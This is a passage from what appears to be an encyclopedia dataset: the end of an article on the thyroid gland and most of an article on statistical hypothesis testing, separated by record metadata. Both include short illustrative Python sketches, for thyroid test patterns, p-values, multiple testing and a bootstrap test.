The use of iodised salt to add iodine to the diet has eliminated endemic cretinism in most developed countries, and over 120 countries have made the iodisation of salt mandatory. Because the thyroid concentrates iodine, it also concentrates the various radioactive isotopes of iodine produced by nuclear fission. In the event of large accidental releases of such material into the environment, the uptake of radioactive iodine isotopes by the thyroid can, in theory, be blocked by saturating the uptake mechanism with a large surplus of non-radioactive iodine, taken in the form of potassium iodide tablets. One consequence of the Chernobyl disaster was an increase in thyroid cancers in children in the years following the accident. Excessive iodine intake is uncommon and usually has no effect on thyroid function; sometimes, though, it may cause hyperthyroidism, and sometimes hypothyroidism with a resulting goitre. Evaluation The thyroid is examined by observation of the gland and the surrounding neck for swelling or enlargement. It is then felt, usually from behind, and the person is often asked to swallow so that the gland can be better felt against the examiner's fingers. The gland moves up and down with swallowing because of its attachments to the thyroid and cricoid cartilages. In a healthy person the gland is not visible, yet it is palpable as a soft mass. Examination of the thyroid gland includes the search for abnormal masses and the assessment of overall thyroid size. The character of the thyroid, any swellings or nodules, and their consistency may all be felt. If a goitre is present, the examiner may also feel down the neck and tap the upper part of the chest to check for retrosternal extension. Further tests may include raising the arms (Pemberton's sign), listening to the gland with a stethoscope for bruits, testing of reflexes, and palpation of the lymph nodes in the head and neck. An examination of the thyroid also includes observation of the person as a whole, to look for systemic signs such as weight gain or loss, hair loss, and signs in other locations, such as protrusion of the eyes or swelling of the calves in Graves' disease. Tests Thyroid function tests include a battery of blood tests, including the measurement of the thyroid hormones as well as of thyroid-stimulating hormone (TSH). They may reveal hyperthyroidism (high T3 and T4), hypothyroidism (low T3 and T4) or subclinical hyperthyroidism (normal T3 and T4 with a low TSH); a schematic sketch of these patterns is given below. TSH levels are considered the most sensitive marker of thyroid dysfunction. They are, however, not always accurate, particularly if the cause of hypothyroidism is thought to be related to insufficient thyrotropin-releasing hormone (TRH) secretion, in which case TSH may be low or falsely normal. In such a case, a TRH stimulation test, in which TRH is given and TSH levels are measured 30 and 60 minutes afterwards, may be conducted. T3 and T4 can be measured directly. However, as the two thyroid hormones travel bound to other molecules, and it is the "free" component that is biologically active, free T3 and free T4 levels can be measured. Free T4 is preferred, because in hypothyroidism T3 levels may be normal. The ratio of bound to unbound thyroid hormones is known as the thyroid hormone binding ratio (THBR). It is also possible to measure directly the main carriers of the thyroid hormones, thyroglobulin and thyroxine-binding globulin. 
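The broad test patterns just described can be written down as a small decision rule. The following Python sketch is illustrative only, not clinical software: the reference ranges are placeholder values (real laboratory ranges vary by assay and population), and the mapping simply encodes the combinations of TSH and free T4 mentioned in the text, including the caveat about a falsely normal TSH in central hypothyroidism.

```python
# Illustrative decision rule only, not clinical software. The reference
# ranges below are placeholders (real laboratory ranges vary by assay);
# the mapping encodes the TSH / free-T4 patterns described in the text.

TSH_RANGE = (0.4, 4.0)       # placeholder TSH reference range
FREE_T4_RANGE = (9.0, 25.0)  # placeholder free T4 reference range


def band(value: float, reference: tuple) -> str:
    """Classify a value as 'low', 'normal' or 'high' against a range."""
    low, high = reference
    if value < low:
        return "low"
    if value > high:
        return "high"
    return "normal"


def interpret(tsh: float, free_t4: float) -> str:
    """Map a (TSH, free T4) pair onto the broad patterns described above."""
    tsh_band = band(tsh, TSH_RANGE)
    t4_band = band(free_t4, FREE_T4_RANGE)
    if t4_band == "high" and tsh_band == "low":
        return "pattern consistent with hyperthyroidism"
    if t4_band == "low" and tsh_band == "high":
        return "pattern consistent with hypothyroidism"
    if t4_band == "normal" and tsh_band == "low":
        return "pattern consistent with subclinical hyperthyroidism"
    if t4_band == "low" and tsh_band in ("low", "normal"):
        return "possible central cause (insufficient TRH/TSH); TSH may be falsely normal"
    return "no single pattern; further testing needed"


if __name__ == "__main__":
    print(interpret(tsh=0.1, free_t4=40.0))   # hyperthyroid pattern
    print(interpret(tsh=12.0, free_t4=4.0))   # hypothyroid pattern
    print(interpret(tsh=0.2, free_t4=15.0))   # subclinical hyperthyroidism
```

Note how the last rule reflects why TSH alone can mislead: in central (TRH/TSH-related) hypothyroidism, a low free T4 can coexist with an unremarkable TSH, which is the situation in which the TRH stimulation test described above would be considered.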
Thyroglobulin will also be measurable in a healthy thyroid, and will increase with inflammation; it may also be used to measure the success of thyroid removal or ablation – if successful, thyroglobulin should be undetectable. Lastly, antibodies against components of the thyroid, particularly anti-TPO and anti-thyroglobulin, can be measured. These may be present in normal individuals but are highly sensitive for autoimmune-related disease. Imaging Ultrasound of the thyroid may be used to reveal whether structures are solid or filled with fluid, helping to differentiate cysts from nodules and goitres. It may also help differentiate between malignant and benign lesions. When further imaging is required, a radiolabelled iodine-123 or technetium-99m uptake scan may take place. This can determine the size and shape of lesions, reveal whether nodules or goitres are metabolically active, and reveal and monitor sites of thyroid disease or cancer deposits outside the thyroid. A fine needle aspiration of a sample of thyroid tissue may be taken in order to evaluate a lesion seen on ultrasound, and is then sent for histopathology and cytology. Computed tomography of the thyroid plays an important role in the evaluation of thyroid cancer. CT scans often detect thyroid abnormalities incidentally, thereby practically becoming the first investigative modality. History The thyroid gland received its modern name in the 1600s, when the anatomist Thomas Wharton likened its shape to that of an Ancient Greek shield, or thyreos. However, the existence of the gland, and of the diseases associated with it, was known long before then. Antiquity The presence and diseases of the thyroid have been noted and treated for thousands of years. In 1600 BCE burnt sponge and seaweed (which contain iodine) were used in China for the treatment of goitres, a practice which later developed in many parts of the world. In Ayurvedic medicine, the book Sushruta Samhita, written about 1400 BCE, described hyperthyroidism, hypothyroidism and goitre. Aristotle and Xenophon in the fifth century BCE described cases of diffuse toxic goitre. Hippocrates and Plato in the fourth century BCE provided some of the first descriptions of the gland itself, proposing its function as a salivary gland. Pliny the Elder in the first century CE referred to epidemics of goitre in the Alps and proposed treatment with burnt seaweed; Galen in the second century likewise referred to burnt sponge for the treatment of goitre. The Chinese pharmacology text Shennong Ben Cao Jing, written ca. 200–250, also refers to goitre. Scientific era In 1500 the polymath Leonardo da Vinci provided the first illustration of the thyroid. In 1543 the anatomist Andreas Vesalius gave the first anatomic description and illustration of the gland. In 1656 the thyroid received its modern name from the anatomist Thomas Wharton. The gland was named thyroid, meaning shield, as its shape resembled the shields commonly used in Ancient Greece. The English name thyroid gland is derived from the medical Latin used by Wharton – glandula thyreoidea. Glandula means 'gland' in Latin, and thyreoidea can be traced back to the Ancient Greek word thyreoeides, meaning 'shield-like/shield-shaped'. French chemist Bernard Courtois discovered iodine in 1811, and in 1896 Eugen Baumann documented it as the central ingredient in the thyroid gland. He did this by boiling the thyroid glands of a thousand sheep, and named the precipitate, a combination of the thyroid hormones, 'iodothyrin'. 
David Marine in 1907 proved that iodine is necessary for thyroid function. Graves' disease was described by Robert James Graves in 1834. The role of the thyroid gland in metabolism was demonstrated in 1895 by Adolf Magnus-Levy. Thyroxine was first isolated in 1914 and synthesized in 1927, and triiodothyronine in 1952. The conversion of T4 to T3 was discovered in 1970. The process of discovering TSH took place over the early to mid twentieth century. TRH was discovered by the Polish-American endocrinologist Andrew Schally in 1970, contributing in part to his Nobel Prize in Physiology or Medicine in 1977. In the nineteenth century numerous authors described both cretinism and myxedema, and their relationship to the thyroid. Charles Mayo coined the term hyperthyroidism in 1910. Hakaru Hashimoto documented a case of Hashimoto's thyroiditis in 1912; antibodies in this disease were demonstrated in 1956. Knowledge of the thyroid and its conditions developed throughout the late nineteenth and twentieth centuries, with many modern treatments and investigative modalities evolving throughout the mid twentieth century, including the use of radioactive iodine, thiouracil and fine needle aspiration. Surgery Either Aetius in the sixth century CE or the Persian physician Ali ibn Abbas al-Magusi in 990 CE conducted the first recorded thyroidectomy as a treatment for goitre. Operations remained risky and generally were not successful until the 19th century, when descriptions emerged from a number of authors including the Prussian surgeon Theodor Billroth, the Swiss surgeon and physiologist Theodor Kocher, the American physician Charles Mayo, and the American surgeons William Halsted and George Crile. These descriptions provided the basis for modern thyroid surgery. Theodor Kocher went on to win the Nobel Prize in Physiology or Medicine in 1909 "for his work on the physiology, pathology and surgery of the thyroid gland". Other animals The thyroid gland is found in all vertebrates. In fish, it is usually located below the gills and is not always divided into distinct lobes. However, in some teleosts, patches of thyroid tissue are found elsewhere in the body, associated with the kidneys, spleen, heart, or eyes. In tetrapods, the thyroid is always found somewhere in the neck region. In most tetrapod species, there are two paired thyroid glands – that is, the right and left lobes are not joined. However, there is only a single thyroid gland in most mammals, and the shape found in humans is common to many other species. In larval lampreys, the thyroid originates as an exocrine gland, secreting its hormones into the gut, and associated with the larva's filter-feeding apparatus. In the adult lamprey, the gland separates from the gut and becomes endocrine, but this path of development may reflect the evolutionary origin of the thyroid. For instance, the closest living relatives of vertebrates, the tunicates and amphioxi (lancelets), have a structure very similar to that of larval lampreys (the endostyle), and this also secretes iodine-containing compounds, though not thyroxine. Thyroxine is critical to metabolic regulation and growth throughout the vertebrate clade. Iodine and T4 trigger the change from a plant-eating, water-dwelling tadpole into a meat-eating, land-dwelling frog, with better neurological, visuospatial, olfactory and cognitive abilities for hunting, as seen in other predatory animals. 
A similar phenomenon occurs in neotenic salamanders such as the axolotl, which, unless iodine is administered, do not transform into land-dwelling adults and instead live and reproduce in their aquatic larval form. Among amphibians, administering a thyroid-blocking agent such as propylthiouracil (PTU) can prevent tadpoles from metamorphosing into frogs; in contrast, administering thyroxine will trigger metamorphosis. Amphibian metamorphosis also provides a well-studied experimental model of apoptosis: thyroxine and iodine induce apoptosis in the cells of the gills, tail, and fins of tadpoles. Iodine, via iodolipids, has favored the evolution of terrestrial animal species and has likely played a crucial role in the evolution of the human brain.
Biology and health sciences
Animal: General
null
30284
https://en.wikipedia.org/wiki/Statistical%20hypothesis%20test
Statistical hypothesis test
A statistical hypothesis test is a method of statistical inference used to decide whether the data sufficiently support a particular hypothesis. A statistical hypothesis test typically involves a calculation of a test statistic. Then a decision is made, either by comparing the test statistic to a critical value or, equivalently, by evaluating a p-value computed from the test statistic. Roughly 100 specialized statistical tests have been defined. History While hypothesis testing was popularized early in the 20th century, early forms were used in the 1700s. The first use is credited to John Arbuthnot (1710), followed by Pierre-Simon Laplace (1770s), in analyzing the human sex ratio at birth; see the human sex ratio example below. Choice of null hypothesis Paul Meehl has argued that the epistemological importance of the choice of null hypothesis has gone largely unacknowledged. When the null hypothesis is predicted by theory, a more precise experiment will be a more severe test of the underlying theory. When the null hypothesis defaults to "no difference" or "no effect", a more precise experiment is a less severe test of the theory that motivated performing the experiment. An examination of the origins of the latter practice may therefore be useful: 1778: Pierre Laplace compares the birthrates of boys and girls in multiple European cities. He states: "it is natural to conclude that these possibilities are very nearly in the same ratio". Thus, the null hypothesis in this case is that the birthrates of boys and girls should be equal, given "conventional wisdom". 1900: Karl Pearson develops the chi squared test to determine "whether a given form of frequency curve will effectively describe the samples drawn from a given population." Thus the null hypothesis is that a population is described by some distribution predicted by theory. He uses as an example the numbers of fives and sixes in the Weldon dice throw data. 1904: Karl Pearson develops the concept of "contingency" in order to determine whether outcomes are independent of a given categorical factor. Here the null hypothesis is by default that two things are unrelated (e.g. scar formation and death rates from smallpox). The null hypothesis in this case is no longer predicted by theory or conventional wisdom, but is instead the principle of indifference that led Fisher and others to dismiss the use of "inverse probabilities". Modern origins and early controversy Modern significance testing is largely the product of Karl Pearson (p-value, Pearson's chi-squared test), William Sealy Gosset (Student's t-distribution), and Ronald Fisher ("null hypothesis", analysis of variance, "significance test"), while hypothesis testing was developed by Jerzy Neyman and Egon Pearson (son of Karl). Ronald Fisher began his life in statistics as a Bayesian (Zabell 1992), but Fisher soon grew disenchanted with the subjectivity involved (namely use of the principle of indifference when determining prior probabilities), and sought to provide a more "objective" approach to inductive inference. Fisher emphasized rigorous experimental design and methods to extract a result from few samples assuming Gaussian distributions. Neyman (who teamed with the younger Pearson) emphasized mathematical rigor and methods to obtain more results from many samples and a wider range of distributions. Modern hypothesis testing is an inconsistent hybrid of the Fisher and Neyman/Pearson formulations, methods and terminology developed in the early 20th century. Fisher popularized the "significance test". 
He required a null-hypothesis (corresponding to a population frequency distribution) and a sample. His (now familiar) calculations determined whether to reject the null-hypothesis or not. Significance testing did not utilize an alternative hypothesis, so there was no concept of a Type II error (false negative). The p-value was devised as an informal, but objective, index meant to help a researcher determine (based on other knowledge) whether to modify future experiments or strengthen one's faith in the null hypothesis. Hypothesis testing (and Type I/II errors) was devised by Neyman and Pearson as a more objective alternative to Fisher's p-value, also meant to determine researcher behaviour, but without requiring any inductive inference by the researcher. Neyman & Pearson considered a different problem to Fisher (which they called "hypothesis testing"). They initially considered two simple hypotheses (both with frequency distributions). They calculated two probabilities and typically selected the hypothesis associated with the higher probability (the hypothesis more likely to have generated the sample). Their method always selected a hypothesis. It also allowed the calculation of both types of error probabilities. Fisher and Neyman/Pearson clashed bitterly. Neyman/Pearson considered their formulation to be an improved generalization of significance testing (the defining paper was abstract; mathematicians have generalized and refined the theory for decades). Fisher thought that it was not applicable to scientific research because often, during the course of the experiment, it is discovered that the initial assumptions about the null hypothesis are questionable due to unexpected sources of error. He believed that the use of rigid reject/accept decisions based on models formulated before data is collected was incompatible with this common scenario faced by scientists, and that attempts to apply this method to scientific research would lead to mass confusion. The dispute between Fisher and Neyman–Pearson was waged on philosophical grounds, characterized by a philosopher as a dispute over the proper role of models in statistical inference. Events intervened: Neyman accepted a position at the University of California, Berkeley in 1938, breaking his partnership with Pearson and separating the disputants (who had occupied the same building). World War II provided an intermission in the debate. The dispute between Fisher and Neyman terminated (unresolved after 27 years) with Fisher's death in 1962. Neyman wrote a well-regarded eulogy. Some of Neyman's later publications reported p-values and significance levels. The modern version of hypothesis testing is a hybrid of the two approaches that resulted from confusion by writers of statistical textbooks (as predicted by Fisher) beginning in the 1940s (but signal detection, for example, still uses the Neyman/Pearson formulation). Great conceptual differences and many caveats in addition to those mentioned above were ignored. Neyman and Pearson provided the stronger terminology, the more rigorous mathematics and the more consistent philosophy, but the subject taught today in introductory statistics has more similarities with Fisher's method than with theirs. Sometime around 1940, authors of statistical textbooks began combining the two approaches by using the p-value in place of the test statistic (or data) to test against the Neyman–Pearson "significance level". Philosophy Hypothesis testing and philosophy intersect. 
Inferential statistics, which includes hypothesis testing, is applied probability. Both probability and its application are intertwined with philosophy. Philosopher David Hume wrote, "All knowledge degenerates into probability." Competing practical definitions of probability reflect philosophical differences. The most common application of hypothesis testing is in the scientific interpretation of experimental data, which is naturally studied by the philosophy of science. Fisher and Neyman opposed the subjectivity of probability. Their views contributed to the objective definitions. The core of their historical disagreement was philosophical. Many of the philosophical criticisms of hypothesis testing are discussed by statisticians in other contexts, particularly correlation does not imply causation and the design of experiments. Hypothesis testing is of continuing interest to philosophers. Education Statistics is increasingly being taught in schools, with hypothesis testing being one of the elements taught. Many conclusions reported in the popular press (from political opinion polls to medical studies) are based on statistics. Some writers have stated that statistical analysis of this kind allows for thinking clearly about problems involving mass data, as well as the effective reporting of trends and inferences from said data, but caution that writers for a broad public should have a solid understanding of the field in order to use the terms and concepts correctly. An introductory college statistics class places much emphasis on hypothesis testing – perhaps half of the course. Such fields as literature and divinity now include findings based on statistical analysis (see the Bible Analyzer). An introductory statistics class teaches hypothesis testing as a cookbook process. Hypothesis testing is also taught at the postgraduate level. Statisticians learn how to create good statistical test procedures (like z, Student's t, F and chi-squared). Statistical hypothesis testing is considered a mature area within statistics, but a limited amount of development continues. An academic study states that the cookbook method of teaching introductory statistics leaves no time for history, philosophy or controversy. Hypothesis testing has been taught as a received, unified method. Surveys showed that graduates of the class were filled with philosophical misconceptions (on all aspects of statistical inference) that persisted among instructors. While the problem was addressed more than a decade ago, and calls for educational reform continue, students still graduate from statistics classes holding fundamental misconceptions about hypothesis testing. Ideas for improving the teaching of hypothesis testing include encouraging students to search for statistical errors in published papers, teaching the history of statistics and emphasizing the controversy in a generally dry subject. Performing a frequentist hypothesis test in practice The typical steps involved in performing a frequentist hypothesis test in practice are: Define a hypothesis (a claim which is testable using data). Select a relevant statistical test with associated test statistic T. Derive the distribution of the test statistic under the null hypothesis from the assumptions. In standard cases this will be a well-known result. For example, the test statistic might follow a Student's t distribution with known degrees of freedom, or a normal distribution with known mean and variance. Select a significance level (α), the maximum acceptable false positive rate. 
Common values are 5% and 1%. Compute from the observations the observed value tobs of the test statistic T. Decide to either reject the null hypothesis in favor of the alternative or not reject it. The Neyman–Pearson decision rule is to reject the null hypothesis H0 if the observed value tobs is in the critical region, and not to reject the null hypothesis otherwise. Practical example The difference in the two processes applied to the radioactive suitcase example (below): "The Geiger-counter reading is 10. The limit is 9. Check the suitcase." "The Geiger-counter reading is high; 97% of safe suitcases have lower readings. The limit is 95%. Check the suitcase." The former report is adequate; the latter gives a more detailed explanation of the data and the reason why the suitcase is being checked. Not rejecting the null hypothesis does not mean the null hypothesis is "accepted" per se (though Neyman and Pearson used that word in their original writings; see the Interpretation section). The processes described here are perfectly adequate for computation. They seriously neglect design-of-experiments considerations. It is particularly critical that appropriate sample sizes be estimated before conducting the experiment. The phrase "test of significance" was coined by the statistician Ronald Fisher. Interpretation When the null hypothesis is true and statistical assumptions are met, the probability that the p-value will be less than or equal to the significance level α is at most α. This ensures that the hypothesis test maintains its specified false positive rate (provided that statistical assumptions are met). The p-value is the probability that a test statistic which is at least as extreme as the one obtained would occur under the null hypothesis. At a significance level of 0.05, a test of a fair coin would be expected to (incorrectly) reject the null hypothesis (that the coin is fair) in about 1 out of 20 tests on average. The p-value does not provide the probability that either the null hypothesis or its opposite is correct (a common source of confusion). If the p-value is less than the chosen significance threshold (equivalently, if the observed test statistic is in the critical region), then we say the null hypothesis is rejected at the chosen level of significance. If the p-value is not less than the chosen significance threshold (equivalently, if the observed test statistic is outside the critical region), then the null hypothesis is not rejected at the chosen level of significance. In the "lady tasting tea" example (below), Fisher required the lady to properly categorize all of the cups of tea to justify the conclusion that the result was unlikely to have resulted from chance. His test revealed that if the lady was effectively guessing at random (the null hypothesis), there was a 1.4% chance that the observed results (perfectly ordered tea) would occur. Use and importance Statistics are helpful in analyzing most collections of data. This is equally true of hypothesis testing, which can justify conclusions even when no scientific theory exists. In the Lady tasting tea example, it was "obvious" that no difference existed between (milk poured into tea) and (tea poured into milk). The data contradicted the "obvious". 
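The 1.4% figure for the tea-tasting design can be reproduced directly. The following is a minimal Python sketch, not drawn from any source cited here; it only assumes the design described above (eight cups, four of each kind, all identified correctly).

from math import comb

# Under the null hypothesis (the lady is guessing), every way of
# labelling 4 of the 8 cups as "milk first" is equally likely.
total_selections = comb(8, 4)      # 70 possible selections
# Exactly one selection matches the true arrangement.
p_value = 1 / total_selections
print(p_value)                     # 0.0142... i.e. about 1.4%
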
Real world applications of hypothesis testing include: Testing whether more men than women suffer from nightmares Establishing authorship of documents Evaluating the effect of the full moon on behavior Determining the range at which a bat can detect an insect by echo Deciding whether hospital carpeting results in more infections Selecting the best means to stop smoking Checking whether bumper stickers reflect car owner behavior Testing the claims of handwriting analysts Statistical hypothesis testing plays an important role in the whole of statistics and in statistical inference. For example, Lehmann (1992) in a review of the fundamental paper by Neyman and Pearson (1933) says: "Nevertheless, despite their shortcomings, the new paradigm formulated in the 1933 paper, and the many developments carried out within its framework continue to play a central role in both the theory and practice of statistics and can be expected to do so in the foreseeable future". Significance testing has been the favored statistical tool in some experimental social sciences (over 90% of articles in the Journal of Applied Psychology during the early 1990s). Other fields have favored the estimation of parameters (e.g. effect size). Significance testing is used as a substitute for the traditional comparison of predicted value and experimental result at the core of the scientific method. When theory is only capable of predicting the sign of a relationship, a directional (one-sided) hypothesis test can be configured so that only a statistically significant result supports theory. This form of theory appraisal is the most heavily criticized application of hypothesis testing. Cautions "If the government required statistical procedures to carry warning labels like those on drugs, most inference methods would have long labels indeed." This caution applies to hypothesis tests and to alternatives to them. The successful hypothesis test is associated with a probability and a type-I error rate. The conclusion might be wrong. The conclusion of the test is only as solid as the sample upon which it is based. The design of the experiment is critical. A number of unexpected effects have been observed, including: The clever Hans effect. A horse appeared to be capable of doing simple arithmetic. The Hawthorne effect. Industrial workers were more productive in better illumination, and most productive in worse. The placebo effect. Pills with no medically active ingredients were remarkably effective. A statistical analysis of misleading data produces misleading conclusions. The issue of data quality can be more subtle. In forecasting, for example, there is no agreement on a measure of forecast accuracy. In the absence of a consensus measurement, no decision based on measurements will be without controversy. Publication bias: Statistically nonsignificant results may be less likely to be published, which can bias the literature. Multiple testing: When multiple tests of true null hypotheses are conducted at once without adjustment, the overall probability of a Type I error is higher than the nominal alpha level. Those making critical decisions based on the results of a hypothesis test are prudent to look at the details rather than the conclusion alone. In the physical sciences most results are fully accepted only when independently confirmed. The general advice concerning statistics is, "Figures never lie, but liars figure" (anonymous). 
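The multiple-testing caution above can be put in numbers. A short illustrative sketch (not from the cited sources) shows how the chance of at least one false positive grows with the number of independent tests of true null hypotheses, and how the classical Bonferroni correction restores roughly the nominal level:

alpha = 0.05

for m in (1, 5, 20, 100):
    # Probability of at least one Type I error among m independent
    # tests of true null hypotheses, each conducted at level alpha.
    fwer = 1 - (1 - alpha) ** m
    # Bonferroni correction: test each hypothesis at level alpha / m.
    fwer_bonferroni = 1 - (1 - alpha / m) ** m
    print(m, round(fwer, 3), round(fwer_bonferroni, 3))

# With m = 20 uncorrected tests the family-wise error rate is already
# about 0.64, even though each individual test is run at 0.05.
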
Definition of terms The following definitions are mainly based on the exposition in the book by Lehmann and Romano: Statistical hypothesis: A statement about the parameters describing a population (not a sample). Test statistic: A value calculated from a sample without any unknown parameters, often to summarize the sample for comparison purposes. Simple hypothesis: Any hypothesis which specifies the population distribution completely. Composite hypothesis: Any hypothesis which does not specify the population distribution completely. Null hypothesis (H0) Positive data: Data that enable the investigator to reject a null hypothesis. Alternative hypothesis (H1) Critical values of a statistical test are the boundaries of the acceptance region of the test. The acceptance region is the set of values of the test statistic for which the null hypothesis is not rejected. Depending on the shape of the acceptance region, there can be one or more than one critical value. Critical region / region of rejection: The set of values of the test statistic for which the null hypothesis is rejected. Power of a test (1 − β) Size: For simple hypotheses, this is the test's probability of incorrectly rejecting the null hypothesis – the false positive rate. For composite hypotheses this is the supremum of the probability of rejecting the null hypothesis over all cases covered by the null hypothesis. The complement of the false positive rate is termed specificity in biostatistics. ("This is a specific test. Because the result is positive, we can confidently say that the patient has the condition.") See sensitivity and specificity and type I and type II errors for exhaustive definitions. Significance level of a test (α) p-value Statistical significance test: A predecessor to the statistical hypothesis test (see the Origins section). An experimental result was said to be statistically significant if a sample was sufficiently inconsistent with the (null) hypothesis. This was variously considered common sense, a pragmatic heuristic for identifying meaningful experimental results, a convention establishing a threshold of statistical evidence, or a method for drawing conclusions from data. The statistical hypothesis test added mathematical rigor and philosophical consistency to the concept by making the alternative hypothesis explicit. The term is loosely used for the modern version, which is now part of statistical hypothesis testing. Conservative test: A test is conservative if, when constructed for a given nominal significance level, the true probability of incorrectly rejecting the null hypothesis is never greater than the nominal level. Exact test A statistical hypothesis test compares a test statistic (z or t, for example) to a threshold. The test statistic is based on optimality. For a fixed level of Type I error rate, use of these statistics minimizes Type II error rates (equivalent to maximizing power). The following terms describe tests in terms of such optimality: Most powerful test: For a given size or significance level, the test with the greatest power (probability of rejection) for a given value of the parameter(s) being tested, contained in the alternative hypothesis. Uniformly most powerful test (UMP) Nonparametric bootstrap hypothesis testing Bootstrap-based resampling methods can be used for null hypothesis testing. A bootstrap creates numerous simulated samples by randomly resampling (with replacement) the original, combined sample data, assuming the null hypothesis is correct; a minimal sketch of such a test follows. 
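The sketch below illustrates the pooled-resampling scheme just described for a two-sample comparison of means. It is an illustration under stated assumptions, not an implementation from any cited source, and the data are made up:

import numpy as np

def bootstrap_mean_diff_test(x, y, n_boot=10_000, seed=0):
    # Two-sample bootstrap test of H0: equal population means.
    # Resamples with replacement from the pooled sample, as described
    # in the text, to approximate the null distribution of the
    # difference in sample means.
    rng = np.random.default_rng(seed)
    observed = np.mean(x) - np.mean(y)
    pooled = np.concatenate([x, y])
    diffs = np.empty(n_boot)
    for i in range(n_boot):
        bx = rng.choice(pooled, size=len(x), replace=True)
        by = rng.choice(pooled, size=len(y), replace=True)
        diffs[i] = bx.mean() - by.mean()
    # Two-sided p-value: fraction of resampled differences at least
    # as extreme as the one actually observed.
    return float(np.mean(np.abs(diffs) >= abs(observed)))

# Hypothetical data purely for illustration:
x = np.array([5.1, 4.9, 6.2, 5.8, 5.5])
y = np.array([4.2, 4.8, 4.4, 4.9, 4.6])
print(bootstrap_mean_diff_test(x, y))
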
The bootstrap is very versatile, as it is distribution-free: it does not rely on restrictive parametric assumptions, but rather on empirical approximate methods with asymptotic guarantees. Traditional parametric hypothesis tests are more computationally efficient but make stronger structural assumptions. In situations where computing the probability of the test statistic under the null hypothesis is hard or impossible (due perhaps to inconvenience or to lack of knowledge of the underlying distribution), the bootstrap offers a viable method for statistical inference. Examples Human sex ratio The earliest use of statistical hypothesis testing is generally credited to the question of whether male and female births are equally likely (null hypothesis), which was addressed in the 1700s by John Arbuthnot (1710), and later by Pierre-Simon Laplace (1770s). Arbuthnot examined birth records in London for each of the 82 years from 1629 to 1710, and applied the sign test, a simple non-parametric test. In every year, the number of males born in London exceeded the number of females. Considering more male or more female births as equally likely, the probability of the observed outcome is 0.5^82, or about 1 in 4,836,000,000,000,000,000,000,000; in modern terms, this is the p-value. Arbuthnot concluded that this is too small to be due to chance and must instead be due to divine providence: "From whence it follows, that it is Art, not Chance, that governs." In modern terms, he rejected the null hypothesis of equally likely male and female births at the p = 1/2^82 significance level. Laplace considered the statistics of almost half a million births. The statistics showed an excess of boys compared to girls. He concluded by calculation of a p-value that the excess was a real, but unexplained, effect. Lady tasting tea In a famous example of hypothesis testing, known as the Lady tasting tea, Dr. Muriel Bristol, a colleague of Fisher, claimed to be able to tell whether the tea or the milk was added first to a cup. Fisher proposed to give her eight cups, four of each variety, in random order. One could then ask what the probability was of her getting the number she got correct purely by chance. The null hypothesis was that the Lady had no such ability. The test statistic was a simple count of the number of successes in selecting the 4 cups. The critical region was the single case of 4 successes out of 4 possible, based on a conventional probability criterion (< 5%). A pattern of 4 successes corresponds to 1 out of 70 possible combinations (p ≈ 1.4%). Fisher asserted that no alternative hypothesis was (ever) required. The lady correctly identified every cup, which would be considered a statistically significant result. Courtroom trial A statistical test procedure is comparable to a criminal trial; a defendant is considered not guilty as long as his or her guilt is not proven. The prosecutor tries to prove the guilt of the defendant. Only when there is enough evidence for the prosecution is the defendant convicted. At the start of the procedure, there are two hypotheses, H0: "the defendant is not guilty", and H1: "the defendant is guilty". The first one, H0, is called the null hypothesis. The second one, H1, is called the alternative hypothesis. It is the alternative hypothesis that one hopes to support. The hypothesis of innocence is rejected only when an error is very unlikely, because one does not want to convict an innocent defendant. 
Such an error is called an error of the first kind (i.e., the conviction of an innocent person), and the occurrence of this error is controlled to be rare. As a consequence of this asymmetric behaviour, an error of the second kind (acquitting a person who committed the crime) is more common. A criminal trial can be regarded as either or both of two decision processes: guilty vs not guilty, or evidence vs a threshold ("beyond a reasonable doubt"). In one view, the defendant is judged; in the other view the performance of the prosecution (which bears the burden of proof) is judged. A hypothesis test can be regarded as either a judgment of a hypothesis or as a judgment of evidence. Philosopher's beans The following example was produced by a philosopher describing scientific methods generations before hypothesis testing was formalized and popularized. Few beans of this handful are white. Most beans in this bag are white. Therefore: Probably, these beans were taken from another bag. This is a hypothetical inference. The beans in the bag are the population. The handful are the sample. The null hypothesis is that the sample originated from the population. The criterion for rejecting the null hypothesis is the "obvious" difference in appearance (an informal difference in the mean). The interesting result is that consideration of a real population and a real sample produced an imaginary bag. The philosopher was considering logic rather than probability. To be a real statistical hypothesis test, this example requires the formalities of a probability calculation and a comparison of that probability to a standard. A simple generalization of the example considers a mixed bag of beans and a handful that contains either very few or very many white beans. The generalization considers both extremes. It requires more calculations and more comparisons to arrive at a formal answer, but the core philosophy is unchanged: if the composition of the handful is greatly different from that of the bag, then the sample probably originated from another bag. The original example is termed a one-sided or a one-tailed test, while the generalization is termed a two-sided or two-tailed test. The statement also relies on the inference that the sampling was random. If someone had been picking through the bag to find white beans, then it would explain why the handful had so many white beans, and also explain why the number of white beans in the bag was depleted (although the bag is probably intended to be assumed much larger than one's hand). Clairvoyant card game A person (the subject) is tested for clairvoyance. They are shown the back face of a randomly chosen playing card 25 times and asked which of the four suits it belongs to. The number of hits, or correct answers, is called X. As we try to find evidence of their clairvoyance, for the time being the null hypothesis is that the person is not clairvoyant. The alternative is: the person is (more or less) clairvoyant. If the null hypothesis is valid, the only thing the test person can do is guess. For every card, the probability (relative frequency) of any single suit appearing is 1/4. If the alternative is valid, the test subject will predict the suit correctly with probability greater than 1/4. We will call the probability of guessing correctly p. The hypotheses, then, are: null hypothesis H0: p = 1/4 (just guessing) and alternative hypothesis H1: p > 1/4 (true clairvoyant). 
When the test subject correctly predicts all 25 cards, we will consider them clairvoyant, and reject the null hypothesis. Thus also with 24 or 23 hits. With only 5 or 6 hits, on the other hand, there is no cause to consider them so. But what about 12 hits, or 17 hits? What is the critical number, c, of hits, at which point we consider the subject to be clairvoyant? How do we determine the critical value c? With the choice c = 25 (i.e. we only accept clairvoyance when all cards are predicted correctly) we're more critical than with c = 10. In the first case almost no test subjects will be recognized to be clairvoyant; in the second case, a certain number will pass the test. In practice, one decides how critical one will be. That is, one decides how often one accepts an error of the first kind – a false positive, or Type I error. With c = 25 the probability of such an error is P(X = 25 | p = 1/4) = (1/4)^25 ≈ 10^−15, and hence very small. The probability of a false positive is the probability of randomly guessing correctly all 25 times. Being less critical, with c = 10, gives P(X ≥ 10 | p = 1/4) ≈ 0.07. Thus, c = 10 yields a much greater probability of a false positive. Before the test is actually performed, the maximum acceptable probability of a Type I error (α) is determined. Typically, values in the range of 1% to 5% are selected. (If the maximum acceptable error rate is zero, an infinite number of correct guesses is required.) Depending on this Type I error rate, the critical value c is calculated. For example, if we select an error rate of 1%, c is determined by the requirement P(X ≥ c | p = 1/4) ≤ 0.01. From all the numbers c with this 